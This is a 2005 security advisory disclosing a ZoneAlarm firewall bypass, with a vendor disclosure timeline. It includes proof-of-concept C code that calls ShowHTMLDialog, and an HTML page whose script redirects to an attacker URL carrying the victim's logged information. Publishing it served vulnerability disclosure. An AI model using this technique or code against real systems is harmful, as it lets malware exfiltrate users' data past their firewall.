The information has been provided by Debasis Mohanty.
The original article can be found at: http://www.hackingspirits.com/vuln-rnd/vuln-rnd.html
* Zone Alarm Pro version 6.0.x
* Zone Alarm Internet Security Suit version 6.0.x
* Zone Alarm Firewall with Anti-Spyware version 6.1.x
* Zone Alarm Firewall with Anti-Virus version 6.0.x
* Zone Alarm Firewall (Free Version) version 6.0.x
By using ShowHTMLDialog() method, it is possible for any malicious program to create a modal dialog box that displays HTML. This in turn can be used to redirect the page to the attacker's site. It is observed that using this method, ZA Pro and Internet Security Suit is unable to block internet access. This method can be used by any malicious program to send data outside via http to the attacker and at the same time it can also receive the command instructions from the attacker.
On successful exploitation the malicious program will be able to send the victim's details and personal system information to the attacker and this can further leads to complete system compromise.
HINSTANCE hinstMSHTML = LoadLibrary(TEXT("MSHTML.DLL"));
// Open a Modal Dialog box of HTML content type
pfnShowHTMLDialog = (SHOWHTMLDIALOGFN*)GetProcAddress(hinstMSHTML, TEXT("ShowHTMLDialog"));
// Invoke the html file containing the data to be sent via http
BSTR bstrURL = SysAllocString(L"c:\\modal-dialog.htm");
CreateURLMoniker(NULL, bstrURL, &pURLMoniker);
(*pfnShowHTMLDialog)(NULL, pURLMoniker, NULL, NULL, NULL);
/* Eof */
< meta http-equiv="Content-Language" content="en-us">
< title>Redirection Dialog< / title>
< ! - - Here goes the information logged by the malicious program which will
be sent to the evil site via http request -->
var sTargetURL = "http://www.hackingspirits.com/vuln-rnd/demo/defeat-osfw.asp?[YourInformation Here] window.location.href = sTargetURL;
< / script>
< / head>
< / html>
10th Oct, 2005 - Bug Originally Discovered
15th Oct, 2005 - Vendor Reported
15th Oct, 2005 - Vendor acknowledged the report
17th Oct, 2005 - Vendor asked for more information
19th Oct, 2005 - Vendor provided with more information and the version info on which the exploit was tested.
29th Oct, 2005 - Final follow up with the vendor but no response
8th Nov, 2005 - Public Disclosure